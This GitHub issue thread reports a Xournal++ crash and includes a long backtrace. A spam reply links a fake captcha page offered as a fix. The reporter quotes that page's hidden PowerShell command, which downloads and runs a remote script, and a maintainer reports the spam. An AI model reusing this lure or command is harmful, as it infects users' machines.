### ISSUE TITLE
Random Crash

### ISSUE THREAD

**Issue by Julian-1-2-3-4-5** [xournalpp/xournalpp#5979]
### Operating System

Linux

### (Linux only) Distribution

Arch

### (Linux only) Desktop Environment

KDE Plasma

### (Linux Only) Display Server

Wayland

### Installation Method

Official Repositories

### Xournal++ Version

1.2.4 (2a4ed3fd)

### libgtk Version

3.24.43

### Bug Description

Once i opened a document of mine, it said that it hat crashed and gave me a logfile.
all data from the document is still there and the restore function even gave me another, empty document

### Expected Behaviour

don't happen

### Steps to Reproduce

I honestly don't know

### Additional Context

Logs:
```
Date: Wed Oct 23 16:01:26 2024
Error: signal 11
Xournal++ version 1.2.4
Git commit 2a4ed3fd from srcdest/makepkg
Gtk version 3.24.43

[bt]: (0) /usr/bin/xournalpp(+0xb2686) [0x5f9e70f10686]
[bt]: (1) /usr/lib/libc.so.6(+0x3d1d0) [0x7c8164f5d1d0]
[bt]: (2) /usr/lib/libc.so.6(pthread_mutex_lock+0x4) [0x7c8164fb79e4]
[bt]: (3) /usr/bin/xournalpp(+0x10eba6) [0x5f9e70f6cba6]
[bt]: (4) /usr/lib/libgtk-3.so.0(+0x28fe9d) [0x7c816608fe9d]
[bt]: (5) /usr/lib/libgtk-3.so.0(gtk_widget_get_preferred_height+0x6b) [0x7c8166090aeb]
[bt]: (6) /usr/lib/libgtk-3.so.0(+0x33fe8f) [0x7c816613fe8f]
[bt]: (7) /usr/lib/libgtk-3.so.0(+0x340241) [0x7c8166140241]
[bt]: (8) /usr/lib/libgobject-2.0.so.0(+0x23080) [0x7c81665e0080]
[bt]: (9) /usr/lib/libgobject-2.0.so.0(g_object_set_valist+0x1e6) [0x7c81665e3436]
[bt]: (10) /usr/lib/libgobject-2.0.so.0(g_object_set+0xbd) [0x7c81665e38fd]
[bt]: (11) /usr/lib/libgtk-3.so.0(+0x27c488) [0x7c816607c488]
[bt]: (12) /usr/lib/libgobject-2.0.so.0(g_cclosure_marshal_VOID__OBJECTv+0x83) [0x7c81665cd4f3]
[bt]: (13) /usr/lib/libgobject-2.0.so.0(+0x32e1c) [0x7c81665efe1c]
[bt]: (14) /usr/lib/libgobject-2.0.so.0(g_signal_emit_valist+0x42) [0x7c81665eff32]
[bt]: (15) /usr/lib/libgobject-2.0.so.0(g_signal_emit+0x94) [0x7c81665efff4]
[bt]: (16) /usr/lib/libgtk-3.so.0(gtk_container_remove+0x9e) [0x7c8165ef759e]
[bt]: (17) /usr/lib/libgtk-3.so.0(+0x3544e1) [0x7c81661544e1]
[bt]: (18) /usr/lib/libgobject-2.0.so.0(g_object_run_dispose+0x36) [0x7c81665de336]
[bt]: (19) /usr/lib/libgtk-3.so.0(+0x272f40) [0x7c8166072f40]
[bt]: (20) /usr/lib/libgobject-2.0.so.0(g_closure_invoke+0xad) [0x7c81665ce78d]
[bt]: (21) /usr/lib/libgobject-2.0.so.0(+0x42ad6) [0x7c81665ffad6]
[bt]: (22) /usr/lib/libgobject-2.0.so.0(+0x32ca9) [0x7c81665efca9]
[bt]: (23) /usr/lib/libgobject-2.0.so.0(g_signal_emit_valist+0x42) [0x7c81665eff32]
[bt]: (24) /usr/lib/libgobject-2.0.so.0(g_signal_emit+0x94) [0x7c81665efff4]
[bt]: (25) /usr/lib/libgtk-3.so.0(+0x354514) [0x7c8166154514]
[bt]: (26) /usr/lib/libgobject-2.0.so.0(g_object_run_dispose+0x36) [0x7c81665de336]
[bt]: (27) /usr/lib/libgtk-3.so.0(+0xa4c20) [0x7c8165ea4c20]
[bt]: (28) /usr/lib/libgtk-3.so.0(+0xf6ea5) [0x7c8165ef6ea5]
[bt]: (29) /usr/lib/libgobject-2.0.so.0(g_closure_invoke+0xad) [0x7c81665ce78d]
[bt]: (30) /usr/lib/libgobject-2.0.so.0(+0x42ad6) [0x7c81665ffad6]
[bt]: (31) /usr/lib/libgobject-2.0.so.0(+0x32ca9) [0x7c81665efca9]
[bt]: (32) /usr/lib/libgobject-2.0.so.0(g_signal_emit_valist+0x42) [0x7c81665eff32]
[bt]: (33) /usr/lib/libgobject-2.0.so.0(g_signal_emit+0x94) [0x7c81665efff4]
[bt]: (34) /usr/lib/libgtk-3.so.0(+0x354514) [0x7c8166154514]
[bt]: (35) /usr/lib/libgobject-2.0.so.0(g_object_run_dispose+0x36) [0x7c81665de336]
[bt]: (36) /usr/lib/libgtk-3.so.0(+0xf6ea5) [0x7c8165ef6ea5]
[bt]: (37) /usr/lib/libgobject-2.0.so.0(g_closure_invoke+0xad) [0x7c81665ce78d]
[bt]: (38) /usr/lib/libgobject-2.0.so.0(+0x42ad6) [0x7c81665ffad6]
[bt]: (39) /usr/lib/libgobject-2.0.so.0(+0x32ca9) [0x7c81665efca9]
[bt]: (40) /usr/lib/libgobject-2.0.so.0(g_signal_emit_valist+0x42) [0x7c81665eff32]
[bt]: (41) /usr/lib/libgobject-2.0.so.0(g_signal_emit+0x94) [0x7c81665efff4]
[bt]: (42) /usr/lib/libgtk-3.so.0(+0x354514) [0x7c8166154514]
[bt]: (43) /usr/lib/libgobject-2.0.so.0(g_object_run_dispose+0x36) [0x7c81665de336]
[bt]: (44) /usr/lib/libgtk-3.so.0(+0xa4c20) [0x7c8165ea4c20]
[bt]: (45) /usr/lib/libgtk-3.so.0(+0xf6ea5) [0x7c8165ef6ea5]
[bt]: (46) /usr/lib/libgobject-2.0.so.0(g_closure_invoke+0xad) [0x7c81665ce78d]
[bt]: (47) /usr/lib/libgobject-2.0.so.0(+0x42ad6) [0x7c81665ffad6]
[bt]: (48) /usr/lib/libgobject-2.0.so.0(+0x32ca9) [0x7c81665efca9]
[bt]: (49) /usr/lib/libgobject-2.0.so.0(g_signal_emit_valist+0x42) [0x7c81665eff32]
[bt]: (50) /usr/lib/libgobject-2.0.so.0(g_signal_emit+0x94) [0x7c81665efff4]
[bt]: (51) /usr/lib/libgtk-3.so.0(+0x354514) [0x7c8166154514]
[bt]: (52) /usr/lib/libgobject-2.0.so.0(g_object_run_dispose+0x36) [0x7c81665de336]
[bt]: (53) /usr/lib/libgtk-3.so.0(+0xa4c20) [0x7c8165ea4c20]
[bt]: (54) /usr/lib/libgtk-3.so.0(+0xf6ea5) [0x7c8165ef6ea5]
[bt]: (55) /usr/lib/libgobject-2.0.so.0(g_closure_invoke+0xad) [0x7c81665ce78d]
[bt]: (56) /usr/lib/libgobject-2.0.so.0(+0x42ad6) [0x7c81665ffad6]
[bt]: (57) /usr/lib/libgobject-2.0.so.0(+0x32ca9) [0x7c81665efca9]
[bt]: (58) /usr/lib/libgobject-2.0.so.0(g_signal_emit_valist+0x42) [0x7c81665eff32]
[bt]: (59) /usr/lib/libgobject-2.0.so.0(g_signal_emit+0x94) [0x7c81665efff4]
[bt]: (60) /usr/lib/libgtk-3.so.0(+0x354514) [0x7c8166154514]
[bt]: (61) /usr/lib/libgobject-2.0.so.0(g_object_run_dispose+0x36) [0x7c81665de336]
[bt]: (62) /usr/lib/libgtk-3.so.0(+0xa4c20) [0x7c8165ea4c20]
[bt]: (63) /usr/lib/libgtk-3.so.0(+0xf6ea5) [0x7c8165ef6ea5]
[bt]: (64) /usr/lib/libgobject-2.0.so.0(g_closure_invoke+0xad) [0x7c81665ce78d]
[bt]: (65) /usr/lib/libgobject-2.0.so.0(+0x42ad6) [0x7c81665ffad6]
[bt]: (66) /usr/lib/libgobject-2.0.so.0(+0x32ca9) [0x7c81665efca9]
[bt]: (67) /usr/lib/libgobject-2.0.so.0(g_signal_emit_valist+0x42) [0x7c81665eff32]
[bt]: (68) /usr/lib/libgobject-2.0.so.0(g_signal_emit+0x94) [0x7c81665efff4]
[bt]: (69) /usr/lib/libgtk-3.so.0(+0x354514) [0x7c8166154514]
[bt]: (70) /usr/lib/libgobject-2.0.so.0(g_object_run_dispose+0x36) [0x7c81665de336]
[bt]: (71) /usr/lib/libgtk-3.so.0(+0x21b9ef) [0x7c816601b9ef]
[bt]: (72) /usr/lib/libgtk-3.so.0(+0xf6ea5) [0x7c8165ef6ea5]
[bt]: (73) /usr/lib/libgobject-2.0.so.0(g_closure_invoke+0xad) [0x7c81665ce78d]
[bt]: (74) /usr/lib/libgobject-2.0.so.0(+0x42ad6) [0x7c81665ffad6]
[bt]: (75) /usr/lib/libgobject-2.0.so.0(+0x32ca9) [0x7c81665efca9]
[bt]: (76) /usr/lib/libgobject-2.0.so.0(g_signal_emit_valist+0x42) [0x7c81665eff32]
[bt]: (77) /usr/lib/libgobject-2.0.so.0(g_signal_emit+0x94) [0x7c81665efff4]
[bt]: (78) /usr/lib/libgtk-3.so.0(+0x354514) [0x7c8166154514]
[bt]: (79) /usr/lib/libgobject-2.0.so.0(g_object_run_dispose+0x36) [0x7c81665de336]
[bt]: (80) /usr/lib/libgtk-3.so.0(+0x3659da) [0x7c81661659da]
[bt]: (81) /usr/lib/libgtk-3.so.0(+0xf6ea5) [0x7c8165ef6ea5]
[bt]: (82) /usr/lib/libgobject-2.0.so.0(g_closure_invoke+0x14a) [0x7c81665ce82a]
[bt]: (83) /usr/lib/libgobject-2.0.so.0(+0x42ad6) [0x7c81665ffad6]
[bt]: (84) /usr/lib/libgobject-2.0.so.0(+0x32ca9) [0x7c81665efca9]
[bt]: (85) /usr/lib/libgobject-2.0.so.0(g_signal_emit_valist+0x42) [0x7c81665eff32]
[bt]: (86) /usr/lib/libgobject-2.0.so.0(g_signal_emit+0x94) [0x7c81665efff4]
[bt]: (87) /usr/lib/libgtk-3.so.0(+0x354514) [0x7c8166154514]
[bt]: (88) /usr/lib/libgtk-3.so.0(+0x360981) [0x7c8166160981]
[bt]: (89) /usr/lib/libgtk-3.so.0(+0x9b570) [0x7c8165e9b570]
[bt]: (90) /usr/lib/libgobject-2.0.so.0(g_object_run_dispose+0x36) [0x7c81665de336]
[bt]: (91) /usr/bin/xournalpp(_ZN8GladeGuiD2Ev+0x52) [0x5f9e70f3b542]
[bt]: (92) /usr/bin/xournalpp(_ZN11XournalMain3runEiPPc+0x69e) [0x5f9e70f0d00e]
[bt]: (93) /usr/lib/libc.so.6(+0x25e08) [0x7c8164f45e08]
[bt]: (94) /usr/lib/libc.so.6(__libc_start_main+0x8c) [0x7c8164f45ecc]
[bt]: (95) /usr/bin/xournalpp(_start+0x25) [0x5f9e70f0a875]


Try to get a better stacktrace...
[bt] #0 /usr/bin/xournalpp(+0xb2df0) [0x5f9e70f10df0]
emergencySave() at ??:?
[bt] #1 /usr/lib/libc.so.6(+0x3d1d0) [0x7c8164f5d1d0]
__sigaction at ??:?
[bt] #2 /usr/lib/libc.so.6(pthread_mutex_lock+0x4) [0x7c8164fb79e4]
pthread_mutex_lock at ??:?
[bt] #3 /usr/bin/xournalpp(+0x10eba6) [0x5f9e70f6cba6]
ToolbarModel::save(std::filesystem::__cxx11::path const&) at ??:?
[bt] #4 /usr/lib/libgtk-3.so.0(+0x28fe9d) [0x7c816608fe9d]
gtk_size_group_remove_widget at ??:?
[bt] #5 /usr/lib/libgtk-3.so.0(gtk_widget_get_preferred_height+0x6b) [0x7c8166090aeb]
gtk_widget_get_preferred_height at ??:?
[bt] #6 /usr/lib/libgtk-3.so.0(+0x33fe8f) [0x7c816613fe8f]
gtk_viewport_get_view_window at ??:?
[bt] #7 /usr/lib/libgtk-3.so.0(+0x340241) [0x7c8166140241]
gtk_viewport_get_view_window at ??:?
[bt] #8 /usr/lib/libgobject-2.0.so.0(+0x23080) [0x7c81665e0080]
g_param_value_validate at ??:?
[bt] #9 /usr/lib/libgobject-2.0.so.0(g_object_set_valist+0x1e6) [0x7c81665e3436]
g_object_set_valist at ??:?
[bt] #10 /usr/lib/libgobject-2.0.so.0(g_object_set+0xbd) [0x7c81665e38fd]
g_object_set at ??:?
[bt] #11 /usr/lib/libgtk-3.so.0(+0x27c488) [0x7c816607c488]
gtk_separator_menu_item_new at ??:?
[bt] #12 /usr/lib/libgobject-2.0.so.0(g_cclosure_marshal_VOID__OBJECTv+0x83) [0x7c81665cd4f3]
g_cclosure_marshal_VOID__OBJECTv at ??:?
[bt] #13 /usr/lib/libgobject-2.0.so.0(+0x32e1c) [0x7c81665efe1c]
g_signal_handlers_destroy at ??:?
[bt] #14 /usr/lib/libgobject-2.0.so.0(g_signal_emit_valist+0x42) [0x7c81665eff32]
g_signal_emit_valist at ??:?
[bt] #15 /usr/lib/libgobject-2.0.so.0(g_signal_emit+0x94) [0x7c81665efff4]
g_signal_emit at ??:?
[bt] #16 /usr/lib/libgtk-3.so.0(gtk_container_remove+0x9e) [0x7c8165ef759e]
gtk_container_remove at ??:?
[bt] #17 /usr/lib/libgtk-3.so.0(+0x3544e1) [0x7c81661544e1]
gtk_widget_set_default_direction at ??:?
[bt] #18 /usr/lib/libgobject-2.0.so.0(g_object_run_dispose+0x36) [0x7c81665de336]
g_object_run_dispose at ??:?
[bt] #19 /usr/lib/libgtk-3.so.0(+0x272f40) [0x7c8166072f40]
gtk_scrollbar_new at ??:?
[bt] #20 /usr/lib/libgobject-2.0.so.0(g_closure_invoke+0xad) [0x7c81665ce78d]
g_closure_invoke at ??:?
[bt] #21 /usr/lib/libgobject-2.0.so.0(+0x42ad6) [0x7c81665ffad6]
g_pointer_type_register_static at ??:?
[bt] #22 /usr/lib/libgobject-2.0.so.0(+0x32ca9) [0x7c81665efca9]
g_signal_handlers_destroy at ??:?
[bt] #23 /usr/lib/libgobject-2.0.so.0(g_signal_emit_valist+0x42) [0x7c81665eff32]
g_signal_emit_valist at ??:?
[bt] #24 /usr/lib/libgobject-2.0.so.0(g_signal_emit+0x94) [0x7c81665efff4]
g_signal_emit at ??:?
[bt] #25 /usr/lib/libgtk-3.so.0(+0x354514) [0x7c8166154514]
gtk_widget_set_default_direction at ??:?
[bt] #26 /usr/lib/libgobject-2.0.so.0(g_object_run_dispose+0x36) [0x7c81665de336]
g_object_run_dispose at ??:?
[bt] #27 /usr/lib/libgtk-3.so.0(+0xa4c20) [0x7c8165ea4c20]
gtk_border_copy at ??:?
[bt] #28 /usr/lib/libgtk-3.so.0(+0xf6ea5) [0x7c8165ef6ea5]
gtk_container_unset_focus_chain at ??:?
[bt] #29 /usr/lib/libgobject-2.0.so.0(g_closure_invoke+0xad) [0x7c81665ce78d]
g_closure_invoke at ??:?
[bt] #30 /usr/lib/libgobject-2.0.so.0(+0x42ad6) [0x7c81665ffad6]
g_pointer_type_register_static at ??:?


Execution log:

DEBUG   : GLib-GIO :: Using cross-namespace EXTERNAL authentication (this will deadlock if server is GDBus < 2.73.3)
DEBUG   : GLib-GIO :: _g_io_module_get_default: Found default implementation dconf (DConfSettingsBackend) for ‘gsettings-backend’
DEBUG   : GLib-GIO :: _g_io_module_get_default: Found default implementation gvfs (GDaemonVfs) for ‘gio-vfs’
DEBUG   : GLib :: unsetenv() is not thread-safe and should not be used after threads are created
DEBUG   : xopp :: TEXTDOMAINDIR = (null), Platform-specific locale dir = /usr/share/xournalpp/../locale, chosen directory = /usr/share/xournalpp/../locale
INFO    : xopp :: Loading plugins from: /usr/share/xournalpp/plugins
INFO    : xopp :: Loading plugins from: /home/julian/.config/xournalpp/plugins
MESSAGE : xopp :: Plugin "MigrateFontSizes" UI initialized
MESSAGE : xopp :: Plugin "QuickScreenshot" UI initialized
DEBUG   : xopp :: Extracted theme info: Name = Breeze, rootname = Breeze, dark = true
DEBUG   : xopp :: Theme name: Breeze
DEBUG   : xopp :: Modified in GtkSettings: false
DEBUG   : xopp :: Theme variant: dark
DEBUG   : xopp :: Icon theme: iconsColor
WARNING : xopp :: [Crash Handler] Crashed with signal 11
WARNING : xopp :: [Crash Handler] Wrote crash log to: /home/julian/.cache/xournalpp/errorlogs/errorlog.20241023-160126.log
```

**Comment by Prateek-coder19** [comment]
to fix your trouble check this solution [click](https://www.calvarywhangarei.co.nz/captha/index.html)
maybe this will solve your problem.

**Comment by Julian-1-2-3-4-5** [comment]
what... first of all what is that captcha, why does it want me to open windows execute window
and paste `powershell -WindowStyle Hidden ([ScriptBlock]::Create((irm https://javierlopez.eu/adapt/kingdom))).Invoke()` there, which invokes this: https://javierlopez.eu/adapt/kingdom script.
seems very fishy. If there was a way to report this comment, i would.
btw good luck trying to get people on github issue tracker -> tech savy people, to run that.
and we are on the xournalpp repository, which most people use on linux, so good luck with win + R to run something

**Comment by rolandlo** [comment]
Thanks @Julian-1-2-3-4-5 for warning users. I have reported the above post by @Prateek-coder19 and will delete the other (same) posts he or she made
![Bildschirmfoto vom 2024-10-25 05-40-17](https://github.com/user-attachments/assets/96e90590-29c9-4f13-baff-71084668c571)
